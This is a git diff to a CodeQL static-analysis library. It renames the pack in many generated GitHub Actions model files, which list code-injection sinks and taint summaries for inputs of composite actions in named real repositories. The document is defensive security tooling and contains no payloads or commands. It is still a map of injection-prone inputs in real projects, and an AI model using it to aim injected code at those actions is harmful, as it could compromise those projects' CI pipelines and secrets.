diff --git a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml index deed2d12573..138ced8ab04 100644 --- a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml +++ b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["conan-io/conan-center-index", "*", "input.files", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml index 353cb30683b..20493280565 100644 --- a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml +++ b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["corretto/corretto-8", "*", "input.version-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml index 25522a67b69..a0d3adcc3d2 100644 --- a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cosmos/cosmos-sdk", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml index c545ad6844e..7db33e6e72c 100644 --- a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["coturn/coturn", "*", "input.SUDO", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml index 941710eb0fe..c4fca4427ec 100644 --- a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["crunchydata/postgres-operator", "*", "input.k3s-channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml index 75b744fc036..09d2beb8947 100644 --- a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml +++ b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cvc5/cvc5", "*", "input.build-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml index 7a4ea3514ba..bd5de74fa09 100644 --- a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml +++ b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["d2l-ai/d2l-en", "*", "input.command", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml index 25a25d085ad..5b46de73fc2 100644 --- a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["danysk/build-check-deploy-gradle-action", "*", "input.clean-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml index 23bd58d66cb..970fd7bc1f1 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-dotnet", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml index 1849ad0e2f5..af46895fa51 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-go", "*", "input.files", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml index c4861c77842..98ef93128eb 100644 
--- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-js", "*", "input.container-id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml index b11931b5408..8d4820efeb7 100644 --- a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datafuselabs/databend", "*", "input.dataset", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml index 1b3fffbe869..44f0c6dce8f 100644 --- a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml +++ b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["davatorium/rofi", "*", "input.logfile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml index df6f6088087..d874137e497 100644 --- a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml +++ b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["debezium/debezium", "*", "input.path-core", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml index 89c10bd95c2..2ec8442b1cf 100644 --- a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml +++ b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["defenseunicorns/zarf", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml index 4a471b5a97c..046bb764a1d 100644 --- a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml +++ b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "input.results_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml index 9f2448a6d75..dcd8a2df02c 100644 --- a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml +++ b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["department-of-veterans-affairs/vets-website", "*", "input.delimiter", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml index dc8a362dc96..238d675e5b7 100644 --- a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml +++ b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["devexpress/devextreme", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml index a1f2ccb164e..c6f83e458bd 100644 --- a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml +++ b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["diggerhq/digger", "*", "input.checkov-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml index 303f9d56cb2..8a10734bd64 100644 --- a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml +++ b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["diku-dk/futhark", "*", "input.script", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml index 2f28cf86431..770554c8b9d 100644 --- a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml +++ b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["discourse/.github", "*", "input.about_json_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml index efbcceb48f5..fb0631e0bbb 100644 --- a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml +++ b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dnsjava/dnsjava", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml index 649fac9fede..caf896bbac3 100644 --- a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dotintent/react-native-ble-plx", "*", "input.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml index 3623fe51e84..02917d6da30 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dotnet/docs-tools", "*", "input.support", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml index d730cdb6a99..17bea3155c5 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dotnet/dotnet-monitor", "*", "input.files_to_commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml index bcec913ef7c..64ff68f38ad 100644 --- a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml +++ b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dragonflydb/dragonfly", "*", "input.gspace-secret", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml index ad5ec2e544f..c6bdede140f 100644 --- a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml +++ b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["drawpile/drawpile", "*", "input.cache_key", "output.cache_key", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml index 9c5c38007bc..7909d617776 100644 --- a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml +++ b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["eksctl-io/eksctl", "*", "input.token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml index 8899c0563e8..c62ee58c440 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["elastic/apm-agent-dotnet", "*", "input.project", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml index f71c818a337..37efd3a4d40 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["elastic/apm-agent-java", "*", "input.tag", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml index 989eca71960..0a84e79d024 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["elastic/apm-server", "*", "input.version", "output.release-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml index 2666233ac87..a026f052934 100644 --- a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml +++ b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["elementor/elementor", "*", "input.README_TXT_PATH", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml index e8aa6be8fa6..9b199fb5973 100644 --- a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml +++ b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["emberjs/data", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml index 9bd16741353..13ae8d0f718 100644 --- a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml +++ b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["emqx/emqx", "*", "input.profile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml index 3c50e297eb5..04775e83571 100644 --- a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml +++ b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["eonasdan/tempus-dominus", "*", "input.VERSION", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml index d1c181a8707..b0b5918d13f 100644 --- a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml +++ b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["erlang/otp", "*", "input.TYPE", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml index 5b600a4cad4..9879b7e4451 100644 --- a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml +++ b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["esphome/esphome", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml index 65fdcb11a00..e38a5edef48 100644 
--- a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml +++ b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["expensify/app", "*", "input.GPG_PASSPHRASE", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml index 08c3ff9cf43..4fa53f367e4 100644 --- a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["expo/expo", "*", "input.ndk-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml index c06978549fb..f3fa2937545 100644 --- a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["expo/vscode-expo", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml index eaca3fb9c62..c66fab9d129 100644 --- a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["external-secrets/external-secrets", "*", "input.image-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml index e1c608d3e10..f7e76b69113 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["facebook/buck2", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml index dc1f7a7b3b8..a216abf29ac 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["facebook/flow", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml index a80ce46abc5..396841a6c16 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["facebook/yoga", "*", "input.version", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml index 15886c2c945..1a3f383d23b 100644 --- a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["facebookresearch/xformers", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml index 45769a727d8..98755665d86 100644 --- a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["fastly/compute-actions", "*", "input.fastly-api-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml index 9f85415a482..5849fe5c34f 100644 --- a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml +++ b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["felangel/bloc", "*", "input.coverage_excludes", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml index bbfb20551af..fdc8478bef7 100644 --- a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["firebase/firebase-ios-sdk", "*", "input.min-ios-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml index f8dc63ee029..72b9c1c870e 100644 --- a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml +++ b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["flagsmith/flagsmith", "*", "input.aws_ecr_repository_arn", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml index 5ad65dcc0bd..b8688ab86d2 100644 --- a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml +++ b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["flaxengine/flaxengine", "*", "input.vulkan-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml index 90b6b38b6b0..e2aacd8f10b 100644 --- a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml index 4f1157d862a..13f28980e57 100644 --- a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml +++ b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["fluxcd/flux2", "*", "input.bindir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml index b8ded477dd2..ee1ef52ecd1 100644 --- a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml +++ b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["forcedotcom/salesforcedx-vscode", "*", "input.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml index 87ae2f5d614..14e60d9cc19 100644 --- a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml +++ b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["fossasia/visdom", "*", "input.loadprbuild", "code-injection", "generated"] 
